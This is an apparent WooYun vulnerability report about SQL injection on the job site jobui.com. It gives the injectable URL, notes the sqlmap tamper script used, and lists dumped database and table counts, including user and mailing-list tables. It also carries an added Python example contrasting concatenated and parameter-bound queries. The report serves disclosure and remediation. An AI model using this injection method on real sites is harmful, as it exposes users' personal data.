
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-041992

Title: SQL injection on the 职友集网 (jobui.com) main site (several million records exposed)

Vendor: 职友集网

Author: xiaoL

Submitted: 2013-11-04 22:26

Fixed: 2013-12-19 22:50

Published: 2013-12-19 22:50

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Bookmarked by 4 users


Vulnerability details

Disclosure timeline:

2013-11-04: Details sent to the vendor, awaiting vendor action
2013-11-09: Vendor confirmed; details visible to the vendor only
2013-11-19: Details disclosed to core white hats and domain experts
2013-11-29: Details disclosed to regular white hats
2013-12-09: Details disclosed to intern white hats
2013-12-19: Details disclosed to the public

Brief description:

Everyone says a flashy title speeds up review, so here is a flashy one.
SQL injection on the 职友集网 main site

Details:

Injection point:
http://www.jobui.com/mianshiti/it/java'/
This spot honestly took me half a day to inject... the backend apparently does not follow the RFC,
so as soon as any URL encoding appears the injection no longer works,
which made constructing the statement take a very long time!

[Screenshot: 55.jpg]


Proof of vulnerability:

Same as usual: once the statement was constructed, sqlmap could do the rest...
To run it I also had to use the space2mysqlblank.py tamper script,
so reading the manual thoroughly is a good habit.
This database user's privileges are fairly broad: all the main databases can be dumped, and everything is readable.
I used the count option to check how much data there is...
and it did not disappoint!
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
Database: jobui_status
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_job_filter | 9458 |
| tb_company_filter | 587 |
+---------------------------------------+---------+
Database: jobui_job
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_job_status_filter | 873686 |
| tb_wiki_item | 1242 |
| tb_wiki_count | 691 |
| tb_wiki | 621 |
| tb_wiki_type | 69 |
+---------------------------------------+---------+
Database: system_setting
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_article_status | 7470 |
| tb_article_info | 7469 |
| tb_sort_area | 3211 |
| tb_subject | 633 |
| tb_subject_bak | 628 |
| tb_subject_info | 552 |
| tb_subject_info_bak | 543 |
| tb_sort_position | 518 |
| tb_article_type | 71 |
| tb_sort_industry | 53 |
| tb_filter_keyword_bak | 15 |
| tb_filter_keyword | 6 |
+---------------------------------------+---------+
Database: jobui_joke
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_joke | 486 |
+---------------------------------------+---------+
Database: jobui_salary
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_salary_log | 272306 |
| tb_salary_status | 130244 |
+---------------------------------------+---------+
Database: jobui_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_company_follow_day | 132809 |
| tb_company_follow_month | 111776 |
| tb_company_comment_day | 14210 |
| tb_company_review_day | 12318 |
| tb_company_comment_month | 12294 |
| tb_company_review_month | 10620 |
+---------------------------------------+---------+
Database: jobui_user
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_user_wx_log | 160639 |
| tb_user_jobSearcher | 82732 |
| tb_user_employmentReport | 79799 |
| tb_user | 66838 |
| tb_user_contact | 66834 |
| tb_user_domain | 66834 |
| tb_user_experience | 66834 |
| tb_user_info | 66834 |
| tb_user_photo | 66834 |
| tb_user_mapping | 66729 |
| tb_user_status | 65996 |
| tb_user_wx | 50431 |
| tb_user_status_follow | 1810 |
| tb_user_status_review | 669 |
| tb_user_status_comment | 573 |
| tb_user_status_photo | 139 |
+---------------------------------------+---------+
Database: jobui_company
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_company_status_job | 8529550 |
| `tb_company_impression-list` | 1220055 |
| tb_impression | 691870 |
| tb_company_status_impression | 469148 |
| `tb_company_photo-content` | 433974 |
| `tb_company_photo-list` | 433974 |
| tb_company_status_filter | 388842 |
| tb_company_salary | 351421 |
| tb_impression_company | 339481 |
| tb_company_news | 203298 |
| tb_company_status_news | 203298 |
| tb_interview_content | 173456 |
| tb_interview | 173455 |
| `tb_company_follow-list` | 160037 |
| tb_interview_job | 137162 |
| tb_company_status_follow | 120325 |
| `tb_company_grade-list` | 87419 |
| tb_company_impression_log | 83569 |
| tb_interview_mapping | 55593 |
| `tb_comment_grade-list` | 49859 |
| tb_company_status_photo | 38496 |
| tb_pay | 36262 |
| `tb_company_comment-list` | 35558 |
| `tb_company_comment-content` | 35470 |
| `tb_company_review-list` | 34267 |
| `tb_company_review-content` | 34266 |
| tb_company_status_comment | 25134 |
| tb_company_status_review | 23344 |
| `tb_company_pay-list` | 22318 |
| tb_company_status_grade | 19159 |
| tb_company_status | 18838 |
| tb_company_status_pay | 18150 |
| tb_company_follow | 17296 |
| tb_comment | 12141 |
| tb_comment_status | 12061 |
| tb_comment_grade | 8335 |
| tb_comment_content | 6735 |
| tb_photo | 6186 |
| tb_photo_count | 6186 |
| tb_review_content | 5402 |
| tb_company_grade | 4751 |
| tb_company_pay | 4393 |
| tb_company_status_logo | 3398 |
| tb_company_edit_log | 1463 |
| tb_logo | 455 |
| tb_accusation | 322 |
+---------------------------------------+---------+
Database: jobui_site
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_info | 20 |
+---------------------------------------+---------+
Database: jobui_mail
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `tb_market_mail_list-personal` | 9566912 |
| tb_market_mail_list | 9566912 |
| `tb_system_mail_list-personal` | 3597191 |
| tb_system_mail_list | 3597191 |
| `tb_subscribe_mail_list-personal` | 1553361 |
| tb_subscribe_mail_list | 1553361 |
| tb_email_template | 12 |
| tb_email_structure | 5 |
+---------------------------------------+---------+
Database: jobui_bbs
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pre_common_district | 45051 |
| pre_common_setting | 397 |
| pre_common_stylevar | 135 |
| pre_common_block_style | 103 |
| pre_common_syscache | 103 |
| pre_common_smiley | 85 |
| pre_common_admincp_perm | 67 |
| pre_common_nav | 52 |
| pre_common_member_profile_setting | 51 |
| pre_forum_forumfield | 35 |
| pre_forum_forum | 34 |
| pre_common_credit_rule | 31 |
| pre_ucenter_settings | 26 |
| pre_common_cron | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| pre_home_click | 15 |
| pre_forum_medal | 10 |
| pre_common_plugin | 9 |
| pre_forum_statlog | 9 |
| pre_common_admingroup | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_common_stat | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_common_admincp_cmenu | 3 |
| pre_common_style | 3 |
| pre_common_template | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_common_admincp_session | 2 |
| pre_common_block | 2 |
| pre_common_failedlogin | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_mobile_setting | 2 |
| pre_common_credit_rule_log | 1 |
| pre_common_diy_data | 1 |
| pre_common_member | 1 |
| pre_common_member_count | 1 |
| pre_common_member_field_forum | 1 |
| pre_common_member_field_home | 1 |
| pre_common_member_profile | 1 |
| pre_common_member_status | 1 |
| pre_common_onlinetime | 1 |
| pre_common_statuser | 1 |
| pre_forum_threadprofile | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_memberfields | 1 |
| pre_ucenter_members | 1 |
+---------------------------------------+---------+
Database: jobui_system
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_survey_vote | 18606 |
| tb_vote | 1109 |
| tb_vote_status | 416 |
| tb_comment | 119 |
| tb_survey_option | 5 |
| tb_topic | 3 |
| tb_survey | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3980 |
| STATISTICS | 1597 |
| KEY_COLUMN_USAGE | 535 |
| TABLE_CONSTRAINTS | 436 |
| PARTITIONS | 430 |
| TABLES | 430 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 276 |
| SESSION_VARIABLES | 276 |
| SCHEMA_PRIVILEGES | 192 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 92 |
| COLLATIONS | 91 |
| CHARACTER_SETS | 28 |
| SCHEMATA | 13 |
| PLUGINS | 6 |
| ENGINES | 5 |
| PROCESSLIST | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

[Screenshot: 77.jpg]


Suggested fix:

Filter and escape that parameter...
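The report's fix is a one-liner, so here is what "filter and escape the parameter" looks like in practice for a path segment such as the category slug in the injection URL above. This is an added example written for this page, not code from the report or from jobui.com; the table, rows, column names and the `validate_slug` allowlist are all hypothetical, and SQLite stands in for the MySQL backend the report identifies (the binding principle is identical). The vulnerable builder splices the segment into the SQL text, so a single quote in the input changes the query structure, which is exactly the defect the report describes; the hardened form rejects anything outside the allowlist before touching the database and binds the value as a parameter.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for an interview-question category table.
    Schema and rows are hypothetical; nothing here is taken from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (slug TEXT PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO category VALUES (?, ?)",
        [("java", "Java interview questions"), ("python", "Python interview questions")],
    )
    return conn


# Allowlist for a slug taken from the URL path: lowercase letters, digits, '-' and '_'.
# Anything else (quotes, spaces, encoded bytes) is rejected before a query is built.
SLUG_RE = re.compile(r"[a-z0-9_-]{1,32}")


def validate_slug(slug: str) -> bool:
    """Return True only if the whole path segment matches the allowlist."""
    return SLUG_RE.fullmatch(slug) is not None


def unsafe_lookup(conn: sqlite3.Connection, slug: str) -> list:
    """Vulnerable pattern: the path segment becomes part of the SQL text.
    A quote in `slug` terminates the string literal and breaks the statement."""
    sql = "SELECT title FROM category WHERE slug = '%s'" % slug
    return [row[0] for row in conn.execute(sql)]


def bound_lookup(conn: sqlite3.Connection, slug: str) -> list:
    """Parameter binding: the driver sends the value separately from the SQL text,
    so a quote is compared literally and can never alter the query structure."""
    rows = conn.execute("SELECT title FROM category WHERE slug = ?", (slug,))
    return [row[0] for row in rows]


def handle_request(conn: sqlite3.Connection, slug: str):
    """Hardened request path: allowlist first, then a bound query.
    Returns None when the slug is rejected (caller maps this to a 400/404)."""
    if not validate_slug(slug):
        return None
    return bound_lookup(conn, slug)


def demo() -> dict:
    """Run both variants on a normal slug and on one carrying a stray quote."""
    conn = build_db()
    results = {
        "bound_ok": bound_lookup(conn, "java"),
        "bound_with_quote": bound_lookup(conn, "java'"),   # literal match, no row
        "hardened_with_quote": handle_request(conn, "java'"),  # rejected up front
    }
    try:
        unsafe_lookup(conn, "java'")
        results["unsafe_error"] = None
    except sqlite3.OperationalError as exc:
        # The concatenated statement is no longer valid SQL: this is the symptom
        # that reveals the injection in the first place.
        results["unsafe_error"] = str(exc)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Binding alone already neutralises the quote (`bound_with_quote` is simply an empty result), but the allowlist is still worth keeping in front of it: it turns malformed segments into a cheap early rejection and gives you a single place to log and alert on unexpected characters in the path, which is the detection signal for attempts like the one in this report.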

Copyright notice: please credit the source when reposting: xiaoL@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2013-11-09 10:37

Vendor reply:

Thanks to WooYun's technical team; our company is currently working on fixing the vulnerability.

Latest status:

None yet